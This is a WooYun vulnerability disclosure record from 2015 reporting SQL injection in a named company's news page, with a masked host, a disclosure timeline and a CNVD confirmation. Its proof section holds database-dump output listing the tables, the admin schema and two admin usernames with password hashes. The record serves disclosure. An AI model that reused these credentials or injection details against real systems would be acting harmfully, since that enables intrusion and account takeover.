当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156159

漏洞标题:阿姆瑞特(亚洲)网络有限公司SQL注入漏洞

相关厂商:阿姆瑞特(亚洲)网络有限公司

漏洞作者: 键盘侠

提交时间:2015-11-28 00:10

修复时间:2016-01-16 17:40

公开时间:2016-01-16 17:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-28: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

阿姆瑞特(亚洲)网络有限公司SQL注入漏洞

详细说明:

阿姆瑞特(亚洲)网络有限公司SQL注入漏洞

漏洞证明:

注入地址:http://**.**.**.**/service/news/showNews.php?col_id=266
注入参数:col_id

1.png


web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
Database: amrt
[30 tables]
+-------------------+
| en_about |
| en_admin |
| en_config |
| en_links |
| en_message |
| en_money_history |
| en_news |
| en_newsclass |
| en_pic |
| en_product |
| en_productclass |
| en_vip |
| en_vip_collection |
| en_vipmsg |
| en_zhengshu |
| w_about |
| w_admin |
| w_config |
| w_links |
| w_message |
| w_money_history |
| w_news |
| w_newsclass |
| w_pic |
| w_product |
| w_productclass |
| w_vip |
| w_vip_collection |
| w_vipmsg |
| w_zhengshu |
+-------------------+
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
Database: amrt
Table: w_admin
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| m_id | int(4) |
| pwd | varchar(50) |
| username | varchar(25) |
+----------+-------------+
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
Database: amrt
Table: w_admin
[2 entries]
+----+------+----------------------------------+----------+
| id | m_id | pwd | username |
+----+------+----------------------------------+----------+
| 1 | 1 | 042cdaadbdc5c1d8158d7a970f166c34 | admin |
| 24 | 0 | b10b6128d923f80bfa55eb6f053925e7 | n699 |
+----+------+----------------------------------+----------+

修复方案:

过滤!

版权声明:转载请注明来源 键盘侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-02 17:38

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无